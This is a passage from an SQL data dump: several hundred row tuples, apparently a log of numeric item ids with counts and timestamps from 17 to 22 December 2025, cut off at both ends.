18:45:02'),(99408,4960,1,'2025-12-17','2025-12-17 19:11:55'),(99409,4685,1,'2025-12-17','2025-12-17 19:14:09'),(99410,3752,1,'2025-12-17','2025-12-17 19:15:01'),(99411,5449,1,'2025-12-17','2025-12-17 19:33:57'),(99412,3724,1,'2025-12-17','2025-12-17 19:42:40'),(99413,80,1,'2025-12-17','2025-12-17 20:10:36'),(99414,5363,1,'2025-12-17','2025-12-17 20:28:33'),(99415,4238,1,'2025-12-17','2025-12-17 20:30:28'),(99416,3083,1,'2025-12-17','2025-12-17 20:30:32'),(99417,5512,1,'2025-12-17','2025-12-17 20:34:06'),(99418,5454,1,'2025-12-17','2025-12-17 21:01:33'),(99419,4660,1,'2025-12-17','2025-12-17 21:01:52'),(99420,4660,1,'2025-12-17','2025-12-17 21:01:53'),(99421,3285,1,'2025-12-17','2025-12-17 21:07:36'),(99422,5570,1,'2025-12-17','2025-12-17 21:11:32'),(99423,74,1,'2025-12-17','2025-12-17 21:47:11'),(99424,2293,1,'2025-12-17','2025-12-17 21:51:12'),(99425,2751,1,'2025-12-17','2025-12-17 22:00:21'),(99426,467,1,'2025-12-17','2025-12-17 22:05:56'),(99427,467,1,'2025-12-17','2025-12-17 22:06:43'),(99428,467,1,'2025-12-17','2025-12-17 22:08:16'),(99429,4542,1,'2025-12-17','2025-12-17 22:22:14'),(99430,4529,1,'2025-12-17','2025-12-17 22:41:42'),(99431,1770,1,'2025-12-17','2025-12-17 23:21:12'),(99432,4960,1,'2025-12-17','2025-12-17 23:28:49'),(99433,4930,1,'2025-12-17','2025-12-17 23:29:16'),(99434,4960,1,'2025-12-17','2025-12-17 23:29:30'),(99435,5593,1,'2025-12-17','2025-12-17 23:38:42'),(99436,1751,1,'2025-12-17','2025-12-17 23:38:43'),(99437,5605,1,'2025-12-17','2025-12-17 23:54:19'),(99438,5146,1,'2025-12-18','2025-12-18 00:05:34'),(99439,4950,1,'2025-12-18','2025-12-18 01:03:06'),(99440,2503,1,'2025-12-18','2025-12-18 01:26:08'),(99441,4960,1,'2025-12-18','2025-12-18 01:48:29'),(99442,5489,1,'2025-12-18','2025-12-18 02:06:56'),(99443,3738,1,'2025-12-18','2025-12-18 02:12:21'),(99444,4722,1,'2025-12-18','2025-12-18 02:35:59'),(99445,3664,1,'2025-12-18','2025-12-18 03:16:06'),(99446,5157,1,'2025-12-18','2025-12-18 04:27:32'),(99447,4950,1,'2025-12-18','2025-12-18 04:49:03'),(99448,5163,1,'2025-12-18','2025-12-18 04:58:44'),(99449,3117,1,'2025-12-18','2025-12-18 05:18:04'),(99450,2704,1,'2025-12-18','2025-12-18 06:01:33'),(99451,4377,1,'2025-12-18','2025-12-18 06:10:50'),(99452,5570,1,'2025-12-18','2025-12-18 06:24:25'),(99453,1582,1,'2025-12-18','2025-12-18 07:35:31'),(99454,80,1,'2025-12-18','2025-12-18 07:43:43'),(99455,3038,1,'2025-12-18','2025-12-18 08:04:22'),(99456,3038,1,'2025-12-18','2025-12-18 08:04:24'),(99457,3534,1,'2025-12-18','2025-12-18 08:12:51'),(99458,4454,1,'2025-12-18','2025-12-18 08:32:08'),(99459,467,1,'2025-12-18','2025-12-18 09:14:34'),(99460,3005,1,'2025-12-18','2025-12-18 09:35:23'),(99461,1730,1,'2025-12-18','2025-12-18 10:05:26'),(99462,4960,1,'2025-12-18','2025-12-18 10:12:27'),(99463,1770,1,'2025-12-18','2025-12-18 10:13:38'),(99464,1544,1,'2025-12-18','2025-12-18 10:17:29'),(99465,1728,1,'2025-12-18','2025-12-18 10:35:04'),(99466,1728,1,'2025-12-18','2025-12-18 10:35:05'),(99467,3691,1,'2025-12-18','2025-12-18 10:40:34'),(99468,5495,1,'2025-12-18','2025-12-18 11:22:13'),(99469,467,1,'2025-12-18','2025-12-18 11:26:39'),(99470,5649,1,'2025-12-18','2025-12-18 11:29:24'),(99471,91,1,'2025-12-18','2025-12-18 11:49:01'),(99472,1772,1,'2025-12-18','2025-12-18 11:50:23'),(99473,3045,1,'2025-12-18','2025-12-18 12:09:48'),(99474,5639,1,'2025-12-18','2025-12-18 12:29:41'),(99475,5682,1,'2025-12-18','2025-12-18 12:32:01'),(99476,5682,1,'2025-12-18','2025-12-18 12:32:15'),(99477,2813,1,'2025-12-18','2025-12-18 12:42:00'),(99478,68,1,'2025-12-18','2025-12-18 12:56:23'),(99479,5657,1,'2025-12-18','2025-12-18 13:36:01'),(99480,4977,1,'2025-12-18','2025-12-18 14:11:22'),(99481,4963,1,'2025-12-18','2025-12-18 14:13:02'),(99482,4529,1,'2025-12-18','2025-12-18 14:46:00'),(99483,68,1,'2025-12-18','2025-12-18 15:02:50'),(99484,5522,1,'2025-12-18','2025-12-18 15:12:11'),(99485,5522,1,'2025-12-18','2025-12-18 15:12:14'),(99486,74,1,'2025-12-18','2025-12-18 16:19:40'),(99487,68,1,'2025-12-18','2025-12-18 16:21:10'),(99488,68,1,'2025-12-18','2025-12-18 16:23:46'),(99489,335,1,'2025-12-18','2025-12-18 16:24:01'),(99490,68,1,'2025-12-18','2025-12-18 16:24:21'),(99491,3781,1,'2025-12-18','2025-12-18 16:26:04'),(99492,91,1,'2025-12-18','2025-12-18 17:22:52'),(99493,469,1,'2025-12-18','2025-12-18 17:23:14'),(99494,5054,1,'2025-12-18','2025-12-18 17:58:46'),(99495,4681,1,'2025-12-18','2025-12-18 18:13:21'),(99496,4712,1,'2025-12-18','2025-12-18 18:47:17'),(99497,4524,1,'2025-12-18','2025-12-18 18:52:26'),(99498,5433,1,'2025-12-18','2025-12-18 19:12:57'),(99499,2293,1,'2025-12-18','2025-12-18 19:18:32'),(99500,2420,1,'2025-12-18','2025-12-18 19:33:50'),(99501,5643,1,'2025-12-18','2025-12-18 19:43:29'),(99502,5561,1,'2025-12-18','2025-12-18 19:52:14'),(99503,2775,1,'2025-12-18','2025-12-18 20:01:33'),(99504,1588,1,'2025-12-18','2025-12-18 20:11:04'),(99505,68,1,'2025-12-18','2025-12-18 20:14:50'),(99506,335,1,'2025-12-18','2025-12-18 20:14:52'),(99507,4966,1,'2025-12-18','2025-12-18 20:15:13'),(99508,4963,1,'2025-12-18','2025-12-18 20:50:41'),(99509,5502,1,'2025-12-18','2025-12-18 20:59:01'),(99510,1544,1,'2025-12-18','2025-12-18 21:30:55'),(99511,5682,1,'2025-12-18','2025-12-18 21:50:43'),(99512,5454,1,'2025-12-18','2025-12-18 21:58:53'),(99513,5140,1,'2025-12-18','2025-12-18 22:30:09'),(99514,5578,1,'2025-12-18','2025-12-18 23:04:49'),(99515,5298,1,'2025-12-18','2025-12-18 23:13:53'),(99516,2813,1,'2025-12-18','2025-12-18 23:19:04'),(99517,5578,1,'2025-12-18','2025-12-18 23:53:26'),(99518,1612,1,'2025-12-19','2025-12-19 00:56:40'),(99519,4950,1,'2025-12-19','2025-12-19 01:12:49'),(99520,5128,1,'2025-12-19','2025-12-19 01:50:04'),(99521,5406,1,'2025-12-19','2025-12-19 02:14:24'),(99522,470,1,'2025-12-19','2025-12-19 02:24:34'),(99523,2904,1,'2025-12-19','2025-12-19 03:05:56'),(99524,5428,1,'2025-12-19','2025-12-19 03:48:37'),(99525,5507,1,'2025-12-19','2025-12-19 03:59:10'),(99526,5409,1,'2025-12-19','2025-12-19 04:03:22'),(99527,5561,1,'2025-12-19','2025-12-19 04:05:29'),(99528,5441,1,'2025-12-19','2025-12-19 04:10:48'),(99529,469,1,'2025-12-19','2025-12-19 04:29:49'),(99530,4694,1,'2025-12-19','2025-12-19 04:34:01'),(99531,4608,1,'2025-12-19','2025-12-19 05:05:04'),(99532,5062,1,'2025-12-19','2025-12-19 05:23:03'),(99533,4776,1,'2025-12-19','2025-12-19 05:33:05'),(99534,3735,1,'2025-12-19','2025-12-19 05:50:51'),(99535,5567,1,'2025-12-19','2025-12-19 05:54:39'),(99536,4391,1,'2025-12-19','2025-12-19 06:02:32'),(99537,5122,1,'2025-12-19','2025-12-19 06:14:04'),(99538,1728,1,'2025-12-19','2025-12-19 06:37:18'),(99539,5101,1,'2025-12-19','2025-12-19 06:49:06'),(99540,4654,1,'2025-12-19','2025-12-19 07:01:28'),(99541,335,1,'2025-12-19','2025-12-19 07:18:43'),(99542,4335,1,'2025-12-19','2025-12-19 07:26:14'),(99543,4412,1,'2025-12-19','2025-12-19 08:20:23'),(99544,5033,1,'2025-12-19','2025-12-19 08:56:51'),(99545,5593,1,'2025-12-19','2025-12-19 09:14:54'),(99546,5062,1,'2025-12-19','2025-12-19 09:38:20'),(99547,1608,1,'2025-12-19','2025-12-19 10:17:32'),(99548,5436,1,'2025-12-19','2025-12-19 11:12:22'),(99549,5420,1,'2025-12-19','2025-12-19 11:23:28'),(99550,5454,1,'2025-12-19','2025-12-19 11:23:30'),(99551,5128,1,'2025-12-19','2025-12-19 11:29:30'),(99552,1739,1,'2025-12-19','2025-12-19 11:34:32'),(99553,5492,1,'2025-12-19','2025-12-19 12:21:10'),(99554,570,1,'2025-12-19','2025-12-19 13:07:46'),(99555,2775,1,'2025-12-19','2025-12-19 13:20:06'),(99556,2775,1,'2025-12-19','2025-12-19 13:32:14'),(99557,3004,1,'2025-12-19','2025-12-19 14:05:46'),(99558,91,1,'2025-12-19','2025-12-19 15:07:20'),(99559,2411,1,'2025-12-19','2025-12-19 15:14:00'),(99560,4950,1,'2025-12-19','2025-12-19 15:22:04'),(99561,1722,1,'2025-12-19','2025-12-19 15:25:22'),(99562,4950,1,'2025-12-19','2025-12-19 15:25:39'),(99563,2150,1,'2025-12-19','2025-12-19 15:29:12'),(99564,4950,1,'2025-12-19','2025-12-19 16:49:03'),(99565,4950,1,'2025-12-19','2025-12-19 16:50:39'),(99566,5502,1,'2025-12-19','2025-12-19 17:13:41'),(99567,3781,1,'2025-12-19','2025-12-19 17:21:16'),(99568,3069,1,'2025-12-19','2025-12-19 17:22:36'),(99569,3069,1,'2025-12-19','2025-12-19 17:22:48'),(99570,5343,1,'2025-12-19','2025-12-19 17:24:22'),(99571,5397,1,'2025-12-19','2025-12-19 17:24:24'),(99572,5343,1,'2025-12-19','2025-12-19 17:24:36'),(99573,3752,1,'2025-12-19','2025-12-19 17:29:08'),(99574,4660,1,'2025-12-19','2025-12-19 17:40:24'),(99575,3731,1,'2025-12-19','2025-12-19 17:41:54'),(99576,3731,1,'2025-12-19','2025-12-19 17:42:29'),(99577,5570,1,'2025-12-19','2025-12-19 17:43:28'),(99578,5454,1,'2025-12-19','2025-12-19 17:46:35'),(99579,5425,1,'2025-12-19','2025-12-19 17:53:46'),(99580,4722,1,'2025-12-19','2025-12-19 18:04:03'),(99581,3117,1,'2025-12-19','2025-12-19 18:10:38'),(99582,3038,1,'2025-12-19','2025-12-19 18:16:37'),(99583,5409,1,'2025-12-19','2025-12-19 18:17:37'),(99584,5441,1,'2025-12-19','2025-12-19 18:19:25'),(99585,91,1,'2025-12-19','2025-12-19 18:26:41'),(99586,1747,1,'2025-12-19','2025-12-19 18:37:16'),(99587,72,1,'2025-12-19','2025-12-19 18:43:29'),(99588,5420,1,'2025-12-19','2025-12-19 18:44:24'),(99589,5067,1,'2025-12-19','2025-12-19 18:47:28'),(99590,4983,1,'2025-12-19','2025-12-19 18:52:36'),(99591,3486,1,'2025-12-19','2025-12-19 18:56:42'),(99592,5461,1,'2025-12-19','2025-12-19 18:56:42'),(99593,110,1,'2025-12-19','2025-12-19 19:04:57'),(99594,4681,1,'2025-12-19','2025-12-19 19:06:00'),(99595,2704,1,'2025-12-19','2025-12-19 19:20:17'),(99596,3056,1,'2025-12-19','2025-12-19 19:57:42'),(99597,5639,1,'2025-12-19','2025-12-19 20:07:51'),(99598,4498,1,'2025-12-19','2025-12-19 20:13:26'),(99599,3275,1,'2025-12-19','2025-12-19 21:00:15'),(99600,467,1,'2025-12-19','2025-12-19 21:07:34'),(99601,4862,1,'2025-12-19','2025-12-19 21:26:10'),(99602,4950,1,'2025-12-19','2025-12-19 21:44:07'),(99603,4950,1,'2025-12-19','2025-12-19 21:50:23'),(99604,3109,1,'2025-12-19','2025-12-19 21:54:18'),(99605,1715,1,'2025-12-19','2025-12-19 22:56:40'),(99606,4944,1,'2025-12-19','2025-12-19 23:00:19'),(99607,4382,1,'2025-12-19','2025-12-19 23:26:16'),(99608,4382,1,'2025-12-19','2025-12-19 23:26:41'),(99609,5146,1,'2025-12-19','2025-12-19 23:46:50'),(99610,3664,1,'2025-12-20','2025-12-20 02:02:27'),(99611,74,1,'2025-12-20','2025-12-20 02:03:48'),(99612,4556,1,'2025-12-20','2025-12-20 02:24:50'),(99613,5420,1,'2025-12-20','2025-12-20 02:30:14'),(99614,5304,1,'2025-12-20','2025-12-20 02:35:34'),(99615,5539,1,'2025-12-20','2025-12-20 03:02:45'),(99616,5062,1,'2025-12-20','2025-12-20 03:06:00'),(99617,2775,1,'2025-12-20','2025-12-20 03:15:06'),(99618,2775,1,'2025-12-20','2025-12-20 03:15:18'),(99619,474,1,'2025-12-20','2025-12-20 03:28:47'),(99620,4556,1,'2025-12-20','2025-12-20 03:53:41'),(99621,5639,1,'2025-12-20','2025-12-20 04:25:45'),(99622,74,1,'2025-12-20','2025-12-20 05:00:55'),(99623,4950,1,'2025-12-20','2025-12-20 05:10:05'),(99624,74,1,'2025-12-20','2025-12-20 05:17:12'),(99625,5163,1,'2025-12-20','2025-12-20 06:18:22'),(99626,5276,1,'2025-12-20','2025-12-20 06:19:51'),(99627,1745,1,'2025-12-20','2025-12-20 06:34:28'),(99628,5406,1,'2025-12-20','2025-12-20 06:53:29'),(99629,5614,1,'2025-12-20','2025-12-20 07:15:33'),(99630,5631,1,'2025-12-20','2025-12-20 07:17:47'),(99631,4802,1,'2025-12-20','2025-12-20 07:23:06'),(99632,76,1,'2025-12-20','2025-12-20 08:10:06'),(99633,3749,1,'2025-12-20','2025-12-20 08:20:42'),(99634,4587,1,'2025-12-20','2025-12-20 08:26:55'),(99635,5080,1,'2025-12-20','2025-12-20 08:27:57'),(99636,1701,1,'2025-12-20','2025-12-20 08:48:47'),(99637,1582,1,'2025-12-20','2025-12-20 08:59:13'),(99638,1582,1,'2025-12-20','2025-12-20 09:09:12'),(99639,4944,1,'2025-12-20','2025-12-20 09:27:34'),(99640,1780,1,'2025-12-20','2025-12-20 09:40:10'),(99641,3006,1,'2025-12-20','2025-12-20 10:04:56'),(99642,68,1,'2025-12-20','2025-12-20 10:41:02'),(99643,5406,1,'2025-12-20','2025-12-20 11:19:35'),(99644,3278,1,'2025-12-20','2025-12-20 11:26:07'),(99645,5653,1,'2025-12-20','2025-12-20 11:27:32'),(99646,5593,1,'2025-12-20','2025-12-20 12:23:41'),(99647,1747,1,'2025-12-20','2025-12-20 12:38:54'),(99648,5406,1,'2025-12-20','2025-12-20 13:06:33'),(99649,5639,1,'2025-12-20','2025-12-20 13:15:32'),(99650,5507,1,'2025-12-20','2025-12-20 13:32:16'),(99651,1734,1,'2025-12-20','2025-12-20 14:10:48'),(99652,91,1,'2025-12-20','2025-12-20 14:21:38'),(99653,76,1,'2025-12-20','2025-12-20 15:16:54'),(99654,5067,1,'2025-12-20','2025-12-20 15:51:38'),(99655,5248,1,'2025-12-20','2025-12-20 16:07:25'),(99656,5248,1,'2025-12-20','2025-12-20 16:07:40'),(99657,5248,1,'2025-12-20','2025-12-20 16:08:34'),(99658,5522,1,'2025-12-20','2025-12-20 16:22:14'),(99659,4373,1,'2025-12-20','2025-12-20 16:41:42'),(99660,2159,1,'2025-12-20','2025-12-20 17:11:39'),(99661,2159,1,'2025-12-20','2025-12-20 17:11:53'),(99662,3307,1,'2025-12-20','2025-12-20 17:36:26'),(99663,5080,1,'2025-12-20','2025-12-20 18:08:19'),(99664,5515,1,'2025-12-20','2025-12-20 18:09:22'),(99665,5657,1,'2025-12-20','2025-12-20 18:14:44'),(99666,5433,1,'2025-12-20','2025-12-20 18:14:52'),(99667,5433,1,'2025-12-20','2025-12-20 18:15:05'),(99668,5649,1,'2025-12-20','2025-12-20 18:15:32'),(99669,3072,1,'2025-12-20','2025-12-20 18:36:24'),(99670,5271,1,'2025-12-20','2025-12-20 18:51:02'),(99671,5457,1,'2025-12-20','2025-12-20 19:02:48'),(99672,5512,1,'2025-12-20','2025-12-20 19:02:48'),(99673,4771,1,'2025-12-20','2025-12-20 19:35:56'),(99674,5400,1,'2025-12-20','2025-12-20 20:01:47'),(99675,4529,1,'2025-12-20','2025-12-20 20:02:48'),(99676,4797,1,'2025-12-20','2025-12-20 20:07:37'),(99677,5639,1,'2025-12-20','2025-12-20 20:13:17'),(99678,5578,1,'2025-12-20','2025-12-20 20:20:26'),(99679,5428,1,'2025-12-20','2025-12-20 20:24:33'),(99680,72,1,'2025-12-20','2025-12-20 20:27:33'),(99681,4944,1,'2025-12-20','2025-12-20 20:29:47'),(99682,4400,1,'2025-12-20','2025-12-20 20:30:47'),(99683,5412,1,'2025-12-20','2025-12-20 20:30:50'),(99684,5489,1,'2025-12-20','2025-12-20 21:00:38'),(99685,5412,1,'2025-12-20','2025-12-20 21:04:55'),(99686,5314,1,'2025-12-20','2025-12-20 21:09:14'),(99687,1586,1,'2025-12-20','2025-12-20 21:10:54'),(99688,5406,1,'2025-12-20','2025-12-20 21:15:59'),(99689,5420,1,'2025-12-20','2025-12-20 21:23:15'),(99690,2904,1,'2025-12-20','2025-12-20 21:47:48'),(99691,5428,1,'2025-12-20','2025-12-20 22:00:34'),(99692,5561,1,'2025-12-20','2025-12-20 22:03:47'),(99693,5125,1,'2025-12-20','2025-12-20 22:05:54'),(99694,5636,1,'2025-12-20','2025-12-20 22:15:33'),(99695,5441,1,'2025-12-20','2025-12-20 22:20:07'),(99696,5567,1,'2025-12-20','2025-12-20 22:25:13'),(99697,1699,1,'2025-12-20','2025-12-20 22:29:54'),(99698,1604,1,'2025-12-20','2025-12-20 22:37:04'),(99699,3045,1,'2025-12-20','2025-12-20 22:53:20'),(99700,4444,1,'2025-12-20','2025-12-20 23:01:18'),(99701,4977,1,'2025-12-20','2025-12-20 23:11:30'),(99702,3479,1,'2025-12-20','2025-12-20 23:26:17'),(99703,1701,1,'2025-12-20','2025-12-20 23:39:06'),(99704,5436,1,'2025-12-20','2025-12-20 23:41:06'),(99705,5449,1,'2025-12-20','2025-12-20 23:41:08'),(99706,5461,1,'2025-12-20','2025-12-20 23:42:40'),(99707,2297,1,'2025-12-20','2025-12-20 23:43:43'),(99708,1602,1,'2025-12-20','2025-12-20 23:44:16'),(99709,5397,1,'2025-12-20','2025-12-20 23:47:01'),(99710,5146,1,'2025-12-21','2025-12-21 00:01:19'),(99711,87,1,'2025-12-21','2025-12-21 00:03:01'),(99712,5425,1,'2025-12-21','2025-12-21 00:22:21'),(99713,4858,1,'2025-12-21','2025-12-21 00:33:04'),(99714,5639,1,'2025-12-21','2025-12-21 01:02:54'),(99715,80,1,'2025-12-21','2025-12-21 01:13:41'),(99716,80,1,'2025-12-21','2025-12-21 01:13:58'),(99717,5649,1,'2025-12-21','2025-12-21 01:16:09'),(99718,5492,1,'2025-12-21','2025-12-21 01:39:36'),(99719,473,1,'2025-12-21','2025-12-21 01:41:18'),(99720,5464,1,'2025-12-21','2025-12-21 02:09:20'),(99721,4712,1,'2025-12-21','2025-12-21 02:11:34'),(99722,1701,1,'2025-12-21','2025-12-21 02:12:09'),(99723,2297,1,'2025-12-21','2025-12-21 02:13:42'),(99724,2813,1,'2025-12-21','2025-12-21 02:15:21'),(99725,4400,1,'2025-12-21','2025-12-21 02:40:44'),(99726,4301,1,'2025-12-21','2025-12-21 03:29:03'),(99727,80,1,'2025-12-21','2025-12-21 04:02:21'),(99728,1602,1,'2025-12-21','2025-12-21 04:19:24'),(99729,2813,1,'2025-12-21','2025-12-21 04:20:26'),(99730,1701,1,'2025-12-21','2025-12-21 04:21:22'),(99731,2297,1,'2025-12-21','2025-12-21 04:21:50'),(99732,5428,1,'2025-12-21','2025-12-21 04:57:49'),(99733,1695,1,'2025-12-21','2025-12-21 05:24:38'),(99734,2813,1,'2025-12-21','2025-12-21 05:33:34'),(99735,2297,1,'2025-12-21','2025-12-21 05:35:35'),(99736,1602,1,'2025-12-21','2025-12-21 05:36:45'),(99737,3041,1,'2025-12-21','2025-12-21 06:06:14'),(99738,2297,1,'2025-12-21','2025-12-21 06:57:47'),(99739,4622,1,'2025-12-21','2025-12-21 07:37:08'),(99740,4622,1,'2025-12-21','2025-12-21 07:41:18'),(99741,1600,1,'2025-12-21','2025-12-21 07:46:05'),(99742,3038,1,'2025-12-21','2025-12-21 08:15:21'),(99743,5067,1,'2025-12-21','2025-12-21 08:21:34'),(99744,5461,1,'2025-12-21','2025-12-21 08:25:37'),(99745,1701,1,'2025-12-21','2025-12-21 08:37:49'),(99746,3117,1,'2025-12-21','2025-12-21 09:34:24'),(99747,5598,1,'2025-12-21','2025-12-21 10:12:41'),(99748,4520,1,'2025-12-21','2025-12-21 11:15:26'),(99749,3297,1,'2025-12-21','2025-12-21 12:03:04'),(99750,5593,1,'2025-12-21','2025-12-21 12:15:26'),(99751,4883,1,'2025-12-21','2025-12-21 12:23:08'),(99752,2804,1,'2025-12-21','2025-12-21 12:27:58'),(99753,91,1,'2025-12-21','2025-12-21 12:39:22'),(99754,4612,1,'2025-12-21','2025-12-21 12:40:30'),(99755,5674,1,'2025-12-21','2025-12-21 13:27:27'),(99756,5622,1,'2025-12-21','2025-12-21 13:37:26'),(99757,4719,1,'2025-12-21','2025-12-21 13:43:11'),(99758,3287,1,'2025-12-21','2025-12-21 16:12:17'),(99759,5662,1,'2025-12-21','2025-12-21 16:12:17'),(99760,3781,1,'2025-12-21','2025-12-21 17:22:51'),(99761,5397,1,'2025-12-21','2025-12-21 17:26:09'),(99762,5371,1,'2025-12-21','2025-12-21 17:28:58'),(99763,5515,1,'2025-12-21','2025-12-21 17:29:39'),(99764,5433,1,'2025-12-21','2025-12-21 17:31:42'),(99765,4529,1,'2025-12-21','2025-12-21 17:54:37'),(99766,5400,1,'2025-12-21','2025-12-21 17:54:37'),(99767,4400,1,'2025-12-21','2025-12-21 18:02:04'),(99768,5412,1,'2025-12-21','2025-12-21 18:07:45'),(99769,5428,1,'2025-12-21','2025-12-21 18:22:45'),(99770,5409,1,'2025-12-21','2025-12-21 18:23:36'),(99771,5128,1,'2025-12-21','2025-12-21 18:23:49'),(99772,3045,1,'2025-12-21','2025-12-21 18:35:20'),(99773,4977,1,'2025-12-21','2025-12-21 18:41:37'),(99774,5449,1,'2025-12-21','2025-12-21 18:50:03'),(99775,72,1,'2025-12-21','2025-12-21 18:51:07'),(99776,3486,1,'2025-12-21','2025-12-21 19:03:53'),(99777,5492,1,'2025-12-21','2025-12-21 19:07:05'),(99778,4712,1,'2025-12-21','2025-12-21 19:19:07'),(99779,5626,1,'2025-12-21','2025-12-21 21:02:44'),(99780,2411,1,'2025-12-21','2025-12-21 21:35:58'),(99781,5636,1,'2025-12-21','2025-12-21 22:36:48'),(99782,4645,1,'2025-12-22','2025-12-22 00:13:09'),(99783,4832,1,'2025-12-22','2025-12-22 01:28:55'),(99784,5067,1,'2025-12-22','2025-12-22 01:31:17'),(99785,1604,1,'2025-12-22','2025-12-22 02:35:25'),(99786,4966,1,'2025-12-22','2025-12-22 02:43:15'),(99787,5454,1,'2025-12-22','2025-12-22 03:14:05'),(99788,2150,1,'2025-12-22','2025-12-22 03:19:28'),(99789,4338,1,'2025-12-22','2025-12-22 03:32:20'),(99790,3781,1,'2025-12-22','2025-12-22 04:06:24'),(99791,5549,1,'2025-12-22','2025-12-22 04:33:40'),(99792,80,1,'2025-12-22','2025-12-22 05:12:08'),(99793,1592,1,'2025-12-22','2025-12-22 05:39:14'),(99794,1592,1,'2025-12-22','2025-12-22 05:39:16'),(99795,5137,1,'2025-12-22','2025-12-22 06:12:50'),(99796,5436,1,'2025-12-22','2025-12-22 06:28:55'),(99797,3023,1,'2025-12-22','2025-12-22 06:46:59'),(99798,2904,1,'2025-12-22','2025-12-22 07:06:12'),(99799,74,1,'2025-12-22','2025-12-22 07:20:08'),(99800,3030,1,'2025-12-22','2025-12-22 07:27:50'),(99801,5662,1,'2025-12-22','2025-12-22 07:29:53'),(99802,5593,1,'2025-12-22','2025-12-22 08:02:41'),(99803,4668,1,'2025-12-22','2025-12-22 08:05:13'),(99804,2503,1,'2025-12-22','2025-12-22 08:09:00'),(99805,3749,1,'2025-12-22','2025-12-22 08:18:19'),(99806,3259,1,'2025-12-22','2025-12-22 08:19:06'),(99807,3259,1,'2025-12-22','2025-12-22 08:22:21'),(99808,5146,1,'2025-12-22','2025-12-22 08:25:41'),(99809,1584,1,'2025-12-22','2025-12-22 08:37:20'),(99810,91,1,'2025-12-22','2025-12-22 08:37:36'),(99811,91,1,'2025-12-22','2025-12-22 08:39:31'),(99812,5028,1,'2025-12-22','2025-12-22 08:43:22'),(99813,91,1,'2025-12-22','2025-12-22 08:49:44'),(99814,1730,1,'2025-12-22','2025-12-22 08:51:39'),(99815,3005,1,'2025-12-22','2025-12-22 08:59:03'),(99816,4428,1,'2025-12-22','2025-12-22 09:14:21'),(99817,2804,1,'2025-12-22','2025-12-22 09:18:54'),(99818,3479,1,'2025-12-22','2025-12-22 09:30:24'),(99819,5131,1,'2025-12-22','2025-12-22 09:38:29'),(99820,5067,1,'2025-12-22','2025-12-22 10:54:21'),(99821,4776,1,'2025-12-22','2025-12-22 11:02:13'),(99822,482,1,'2025-12-22','2025-12-22 11:12:12'),(99823,91,1,'2025-12-22','2025-12-22 11:31:53'),(99824,5464,1,'2025-12-22','2025-12-22 12:08:48'),(99825,2503,1,'2025-12-22','2025-12-22 12:30:09'),(99826,76,1,'2025-12-22','2025-12-22 12:30:14'),(99827,80,1,'2025-12-22','2025-12-22 12:30:35'),(99828,80,1,'2025-12-22','2025-12-22 12:30:46'),(99829,2904,1,'2025-12-22','2025-12-22 12:31:00'),(99830,5582,1,'2025-12-22','2025-12-22 12:31:29'),(99831,5425,1,'2025-12-22','2025-12-22 12:31:58'),(99832,5122,1,'2025-12-22','2025-12-22 12:32:13'),(99833,4691,1,'2025-12-22','2025-12-22 12:32:36'),(99834,469,1,'2025-12-22','2025-12-22 14:06:04'),(99835,5409,1,'2025-12-22','2025-12-22 14:46:48'),(99836,1610,1,'2025-12-22','2025-12-22 14:54:01'),(99837,5412,1,'2025-12-22','2025-12-22 15:07:29'),(99838,5054,1,'2025-12-22','2025-12-22 15:17:54'),(99839,3102,1,'2025-12-22','2025-12-22 16:54:00'),(99840,5561,1,'2025-12-22','2025-12-22 17:05:14'),(99841,5502,1,'2025-12-22','2025-12-22 17:13:59'),(99842,3307,1,'2025-12-22','2025-12-22 17:14:50'),(99843,4771,1,'2025-12-22','2025-12-22 17:21:15'),(99844,485,1,'2025-12-22','2025-12-22 17:21:16'),(99845,3069,1,'2025-12-22','2025-12-22 17:23:35'),(99846,3752,1,'2025-12-22','2025-12-22 17:28:41'),(99847,5457,1,'2025-12-22','2025-12-22 17:38:47'),(99848,5512,1,'2025-12-22','2025-12-22 17:38:47'),(99849,4660,1,'2025-12-22','2025-12-22 17:41:34'),(99850,5570,1,'2025-12-22','2025-12-22 17:44:54'),(99851,5454,1,'2025-12-22','2025-12-22 17:47:59'),(99852,5425,1,'2025-12-22','2025-12-22 17:54:14'),(99853,5578,1,'2025-12-22','2025-12-22 17:58:27'),(99854,5489,1,'2025-12-22','2025-12-22 18:03:49'),(99855,4722,1,'2025-12-22','2025-12-22 18:04:54'),(99856,5406,1,'2025-12-22','2025-12-22 18:09:18'),(99857,3117,1,'2025-12-22','2025-12-22 18:11:23'),(99858,2904,1,'2025-12-22','2025-12-22 18:13:30'),(99859,3038,1,'2025-12-22','2025-12-22 18:17:52'),(99860,5561,1,'2025-12-22','2025-12-22 18:18:08'),(99861,5441,1,'2025-12-22','2025-12-22 18:18:52'),(99862,5125,1,'2025-12-22','2025-12-22 18:19:07'),(99863,5567,1,'2025-12-22','2025-12-22 18:25:14'),(99864,4753,1,'2025-12-22','2025-12-22 18:33:19'),(99865,4674,1,'2025-12-22','2025-12-22 18:36:17'),(99866,4960,1,'2025-12-22','2025-12-22 18:37:54'),(99867,5436,1,'2025-12-22','2025-12-22 18:38:23'),(99868,5436,1,'2025-12-22','2025-12-22 18:43:24'),(99869,3781,1,'2025-12-22','2025-12-22 18:46:21'),(99870,5420,1,'2025-12-22','2025-12-22 18:46:31'),(99871,5420,1,'2025-12-22','2025-12-22 18:47:25'),(99872,4983,1,'2025-12-22','2025-12-22 18:53:57'),(99873,5461,1,'2025-12-22','2025-12-22 18:58:14'),(99874,110,1,'2025-12-22','2025-12-22 19:08:00'),(99875,4681,1,'2025-12-22','2025-12-22 19:08:02'),(99876,5464,1,'2025-12-22','2025-12-22 19:10:06'),(99877,4391,1,'2025-12-22','2025-12-22 19:17:13'),(99878,4444,1,'2025-12-22','2025-12-22 19:21:20'),(99879,485,1,'2025-12-22','2025-12-22 19:27:24'),(99880,5406,1,'2025-12-22','2025-12-22 19:43:08'),(99881,5512,1,'2025-12-22','2025-12-22 19:53:15'),(99882,5472,1,'2025-12-22','2025-12-22 20:25:19'),(99883,4950,1,'2025-12-22','2025-12-22 20:40:17'),(99884,5582,1,'2025-12-22','2025-12-22 20:58:35'),(99885,4448,1,'2025-12-22','2025-12-22 21:12:02'),(99886,3705,1,'2025-12-22','2025-12-22 21:17:23'),(99887,3307,1,'2025-12-22','2025-12-22 21:23:54'),(99888,4988,1,'2025-12-22','2025-12-22 22:06:43'),(99889,5536,1,'2025-12-22','2025-12-22 22:38:53'),(99890,4301,1,'2025-12-22','2025-12-22 22:58:23'),(99891,5433,1,'2025-12-22','2025-12-22 23:29:37'),(99892,5512,1,'2025-12-22','2025-12-22 